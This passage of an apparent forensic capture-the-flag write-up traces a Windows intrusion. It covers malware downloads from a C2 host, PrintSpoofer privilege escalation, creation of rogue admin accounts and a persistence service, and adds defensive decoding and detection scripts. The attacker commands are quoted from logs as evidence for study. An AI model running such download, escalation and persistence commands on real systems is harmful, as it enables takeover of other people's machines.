  "Hashes": "MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88",
  "ParentProcessId": "6204",
  "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" whoami /priv"
}

After which, the files spf.exe and final.exe were downloaded onto the workstation:

{
  "UtcTime": "2022-06-20 17:20:06.648",
  "ProcessId": "6804",
  "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
  "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" iwr http://phishteam.xyz/02dcf07/spf.exe -outfile spf.exe",
  "User": "TEMPEST\\benimaru",
  "Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
  "ParentProcessId": "4208",
  "ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}
{
  "UtcTime": "2022-06-20 17:21:05.827",
  "ProcessId": "3712",
  "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
  "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" iwr http://phishteam.xyz/02dcf07/final.exe -outfile C:\\ProgramData\\final.exe",
  "User": "TEMPEST\\benimaru",
  "Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
  "ParentProcessId": "4208",
  "ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}

spf.exe was executed with final.exe as the command to run (-c C:\ProgramData\final.exe). Based on the executable's hash, spf.exe was identified as PrintSpoofer, an exploit that abuses impersonation privileges (SeImpersonatePrivilege) to obtain a SYSTEM token; the resulting final.exe process runs as NT AUTHORITY\SYSTEM. The threat actor was most likely tipped off to this privilege by the earlier whoami /priv enumeration.

{
  "UtcTime": "2022-06-20 17:21:34.192",
  "ProcessId": "6828",
  "Image": "C:\\Users\\benimaru\\Downloads\\spf.exe",
  "CommandLine": "\"C:\\Users\\benimaru\\Downloads\\spf.exe\" -c C:\\ProgramData\\final.exe",
  "User": "TEMPEST\\benimaru",
  "Hashes": "MD5=108DA75DE148145B8F056EC0827F1665,SHA256=8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D,IMPHASH=545A81240793F9CA97306FA5B3AD76DF",
  "ParentProcessId": "4208",
  "ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}
{
  "UtcTime": "2022-06-20 17:21:34.268",
  "ProcessId": "8264",
  "Image": "C:\\ProgramData\\final.exe",
  "CommandLine": "C:\\ProgramData\\final.exe",
  "User": "NT AUTHORITY\\SYSTEM",
  "Hashes": "MD5=4C014F94A8FA0B484A2EDAB422AB2A1A,SHA256=03E1840A24506AFC88AB5FF7F83D2B07B558B34FF42DD34DD93267FD2E7A74E6,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2",
  "ParentProcessId": "6828",
  "ParentCommandLine": "\"C:\\Users\\benimaru\\Downloads\\spf.exe\" -c C:\\ProgramData\\final.exe"
}

After the execution of final.exe, Sysmon network connection events (Event ID 3) were checked for callbacks, and a connection to 167.71.222.162 on port 8080 was found:

$ cat sysmon.json | grep EventId..3, | grep -i final.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^U|^Source(Ip|Port)|^Destination(Ip|Port)"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add' | grep -E 'Image|Destination(Ip|Port")' | sort | uniq

  "DestinationIp": "167.71.222.162",
  "DestinationPort": "8080",
  "Image": "C:\\ProgramData\\final.exe",

IV. Post-Exploitation

Now, the attacker has gained administrative privileges inside the machine. Find all persistence techniques used by the attacker.

In addition, the unusual executions are related to the malicious C2 binary used during privilege escalation.

Callbacks to 167.71.222.162:8080 were parsed and decoded using the following command:

$ for i in $(tshark -r capture.pcapng -Y '(ip.dst==167.71.222.162 and tcp.port eq 8080) and frame contains "?q="' -T fields -e http.request.uri | cut -d'=' -f2-); 
> do echo "$i" | base64 -d;
> done
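Both decoding loops (this one for the port 8080 callbacks and the earlier one for the port 80 beacons in the Discovery section) rely on cut and base64 -d. The added example below, written for this page and not part of the original writeup or of the C2 tooling, does the same job in Python and also splits each record into the "command - output" form this C2 uses. The first URIs are the ones quoted in the Discovery section; the last is constructed so that its base64 value carries '=' padding, which `cut -d'=' -f2` would strip and make base64 -d fail.

```python
import base64
import binascii
from urllib.parse import urlsplit, unquote

# URIs as printed by `tshark -T fields -e http.request.uri` for the C2 host.
# The first four are the values quoted in this writeup; the last one is
# constructed here so that its base64 value ends in '=' padding.
SAMPLE_URIS = [
    "/9ab62b5",
    "/9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K",
    "/9ab62b5",
    "/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K",
    "/9ab62b5?q=" + base64.b64encode(
        b"net users - \r\nUser accounts for \\\\TEMPEST\r\n").decode(),
]


def decode_beacon(uri):
    """Return the decoded `q` value of one beacon URI, or None for a plain
    check-in (no q=) or an undecodable value.

    The query is split by hand rather than with parse_qs, which would turn
    the base64 '+' character into a space. Missing '=' padding is restored,
    which is exactly what `cut -d'=' -f2` on the URI strips off."""
    params = dict(p.split("=", 1) for p in urlsplit(uri).query.split("&") if "=" in p)
    if "q" not in params:
        return None
    b64 = unquote(params["q"])          # undo %2B / %2F if the client encoded them
    b64 += "=" * (-len(b64) % 4)
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def split_beacon(decoded):
    """Split one decoded record into (command, output). This C2 sends
    'command - output' with CRLF line endings; blank leading/trailing lines
    and trailing spaces (PowerShell pads table columns) are removed."""
    cmd, sep, out = decoded.partition(" - ")
    if not sep:
        return decoded.strip(), ""
    lines = [ln.rstrip() for ln in out.replace("\r\n", "\n").split("\n")]
    while lines and not lines[0]:
        lines.pop(0)
    while lines and not lines[-1]:
        lines.pop()
    return cmd.strip(), "\n".join(lines)


def decode_c2_session(uris):
    """Reconstruct the ordered (command, output) session from beacon URIs,
    skipping empty check-ins and undecodable values."""
    session = []
    for uri in uris:
        decoded = decode_beacon(uri)
        if decoded is not None:
            session.append(split_beacon(decoded))
    return session


if __name__ == "__main__":
    for cmd, out in decode_c2_session(SAMPLE_URIS):
        print(f"> {cmd}\n{out}\n")
```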

The threat actor's current user context is now NT AUTHORITY\SYSTEM, the highest-privileged local account on the workstation:

> whoami

  nt authority\system

> pwd 

  Path
  ----
  C:\Windows\system32
  
> whoami /priv

  PRIVILEGES INFORMATION
  ----------------------

  Privilege Name                            Description                                                        State
  ========================================= ================================================================== =======
  SeCreateTokenPrivilege                    Create a token object                                              Enabled
  SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
  SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
  SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
  SeTcbPrivilege                            Act as part of the operating system                                Enabled
  SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
  SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
  SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
  SeSystemProfilePrivilege                  Profile system performance                                         Enabled
  SeSystemtimePrivilege                     Change the system time                                             Enabled
  SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
  SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
  SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
  SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
  SeBackupPrivilege                         Back up files and directories                                      Enabled
  SeRestorePrivilege                        Restore files and directories                                      Enabled
  SeShutdownPrivilege                       Shut down the system                                               Enabled
  SeDebugPrivilege                          Debug programs                                                     Enabled
  SeAuditPrivilege                          Generate security audits                                           Enabled
  SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
  SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
  SeUndockPrivilege                         Remove computer from docking station                               Enabled
  SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
  SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
  SeCreateGlobalPrivilege                   Create global objects                                              Enabled
  SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
  SeRelabelPrivilege                        Modify an object label                                             Enabled
  SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
  SeTimeZonePrivilege                       Change the time zone                                               Enabled
  SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
  SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

The threat actor attempted to add two new users, shuna and shion, but the first attempts failed because the /add switch was omitted from the net user command (without it, net user tries to modify an account that does not yet exist):

> net user shuna pr1nc3ss!

> net user shion m4st3rch3f!

> net users

  User accounts for \\

  -------------------------------------------------------------------------------
  Administrator            benimaru                 DefaultAccount
  Guest                    rimuru                   WDAGUtilityAccount
  The command completed with one or more errors.

This time around, with the correct command, the two users were successfully created:

> net user /add shuna princess 

  The command completed successfully.

> net user /add shion m4st3rch3f! 

  The command completed successfully.
  
> net users
  
  User accounts for \\

  -------------------------------------------------------------------------------
  Administrator            benimaru                 DefaultAccount
  Guest                    rimuru                   shion
  shuna                    WDAGUtilityAccount
  The command completed with one or more errors.

The threat actor also changed the local Administrator's password and added the new user, shion, to the local Administrators group:

> net user Administrator ch4ng3dpassword! 

  The command completed successfully.

> net localgroup administrators /add shion
  
  The command completed successfully.
  
> net localgroup administrators

  Alias name     administrators
  Comment        Administrators have complete and unrestricted access to the computer/domain

  Members

  -------------------------------------------------------------------------------
  Administrator
  rimuru
  shion
  The command completed successfully.

The logs below confirm the creation of the two new users (Event ID 4720) as well as the addition of shion to the local Administrators group (Event ID 4732); the MemberSid ending in -1003 matches shion's SID from the 4720 event:

$ cat windows.json | grep -E 'EventId..4720' | jq -r '{Username: .PayloadData1, Time: .TimeCreated}'

  {
    "Username": "Target: TEMPEST\\shuna (S-1-5-21-349058839-1848105669-1528301110-1002)",
    "Time": "2022-06-20T17:27:19.1269169+00:00"
  }
  {
    "Username": "Target: TEMPEST\\shion (S-1-5-21-349058839-1848105669-1528301110-1003)",
    "Time": "2022-06-20T17:27:28.6292691+00:00"
  }
  
$ cat windows.json | grep -E 'EventId..4732' | grep Administrators | jq -r '{Group: .PayloadData1, MemberSID: .PayloadData4, Time: .TimeCreated}'

  {
    "Group": "Target: Builtin\\Administrators (S-1-5-32-544)",
    "MemberSID": "MemberSid: S-1-5-21-349058839-1848105669-1528301110-1003",
    "Time": "2022-06-20T17:27:41.2977760+00:00"
  }
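The two jq queries above are joined by eye on the SID suffix. The script below is an added example (not part of the challenge or the write-up's own commands) that automates that correlation: it reads EvtxECmd-style JSON lines, remembers every account created by a 4720 event, and flags any of those SIDs that a 4732 event adds to Builtin\Administrators within a short window. The record fields (EventId, TimeCreated, PayloadData1, PayloadData4) follow the output quoted above; the sample records embedded in the script are constructed and only mimic the SIDs and timestamps shown here.

```python
"""Correlate Security events 4720 (user created) and 4732 (member added to a
local group) from EvtxECmd JSON output and flag new accounts that were made
local administrators shortly after creation.

Added example for this write-up, not challenge material. Field names follow
the EvtxECmd JSON quoted in the write-up; SAMPLE_LOG is constructed.
"""
import json
import re
from datetime import datetime

# Constructed sample of EvtxECmd JSON lines (one record per line). The 4624
# record is noise to show that unrelated events are ignored.
SAMPLE_LOG = r'''
{"EventId": 4720, "TimeCreated": "2022-06-20T17:27:19.1269169+00:00", "PayloadData1": "Target: TEMPEST\\shuna (S-1-5-21-349058839-1848105669-1528301110-1002)"}
{"EventId": 4720, "TimeCreated": "2022-06-20T17:27:28.6292691+00:00", "PayloadData1": "Target: TEMPEST\\shion (S-1-5-21-349058839-1848105669-1528301110-1003)"}
{"EventId": 4732, "TimeCreated": "2022-06-20T17:27:41.2977760+00:00", "PayloadData1": "Target: Builtin\\Administrators (S-1-5-32-544)", "PayloadData4": "MemberSid: S-1-5-21-349058839-1848105669-1528301110-1003"}
{"EventId": 4624, "TimeCreated": "2022-06-20T17:28:00.0000000+00:00", "PayloadData1": "Target: TEMPEST\\rimuru"}
'''

# "Target: DOMAIN\name (S-1-...)" as written in PayloadData1 of 4720/4732.
TARGET_WITH_SID = re.compile(r'Target:\s+(\S+)\s+\((S-1-[\d-]+)\)')
# "MemberSid: S-1-..." as written in PayloadData4 of 4732.
MEMBER_SID = re.compile(r'MemberSid:\s+(S-1-[\d-]+)')
# Well-known SID of the built-in Administrators group.
ADMINISTRATORS_SID = 'S-1-5-32-544'
# EvtxECmd writes 7 fractional-second digits; fromisoformat accepts at most 6.
_FRAC = re.compile(r'(\.\d{1,6})\d*')


def parse_time(ts):
    """Parse an EvtxECmd TimeCreated string into a timezone-aware datetime."""
    return datetime.fromisoformat(_FRAC.sub(r'\1', ts))


def load_events(text):
    """Parse newline-delimited JSON records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def created_accounts(events):
    """Map SID -> (account name, creation time) for every 4720 event."""
    created = {}
    for ev in events:
        if ev.get('EventId') != 4720:
            continue
        m = TARGET_WITH_SID.search(ev.get('PayloadData1', ''))
        if m:
            created[m.group(2)] = (m.group(1), parse_time(ev['TimeCreated']))
    return created


def find_new_admins(events, window_seconds=600):
    """Return accounts created (4720) and then added to Builtin\\Administrators
    (4732) within window_seconds of their creation."""
    created = created_accounts(events)
    findings = []
    for ev in events:
        if ev.get('EventId') != 4732:
            continue
        group = TARGET_WITH_SID.search(ev.get('PayloadData1', ''))
        member = MEMBER_SID.search(ev.get('PayloadData4', ''))
        if not group or not member or group.group(2) != ADMINISTRATORS_SID:
            continue
        sid = member.group(1)
        if sid not in created:
            continue  # pre-existing account; still notable, but not "new"
        account, created_at = created[sid]
        delta = (parse_time(ev['TimeCreated']) - created_at).total_seconds()
        if 0 <= delta <= window_seconds:
            findings.append({'account': account, 'sid': sid,
                             'seconds_after_creation': delta})
    return findings


if __name__ == '__main__':
    for hit in find_new_admins(load_events(SAMPLE_LOG)):
        print('new local admin: {account} ({sid}) added {seconds_after_creation:.1f}s '
              'after creation'.format(**hit))
```

Against the sample, only shion is reported (created at 17:27:28, added to Administrators at 17:27:41); shuna was created but never promoted. To run it on the real export, replace SAMPLE_LOG with the contents of windows.json, which EvtxECmd writes as one JSON object per line.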

Another persistence method was creating a service, TempestUpdate2, that runs C:\ProgramData\final.exe as LocalSystem at boot (the first attempt, named TempestUpdate, failed because a service with that name already existed):

> sc.exe \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto 

  [SC] CreateService FAILED 1073:

  The specified service already exists.
  
> sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto

  [SC] CreateService SUCCESS
  
> sc.exe qc TempestUpdate2

  [SC] QueryServiceConfig SUCCESS

  SERVICE_NAME: TempestUpdate2
          TYPE               : 10  WIN32_OWN_PROCESS
          START_TYPE         : 2   AUTO_START
          ERROR_CONTROL      : 1   NORMAL
          BINARY_PATH_NAME   : C:\ProgramData\final.exe
          LOAD_ORDER_GROUP   :
          TAG                : 0
          DISPLAY_NAME       : TempestUpdate2
          DEPENDENCIES       :
          SERVICE_START_NAME : LocalSystem  

TIMELINE OF EVENTS
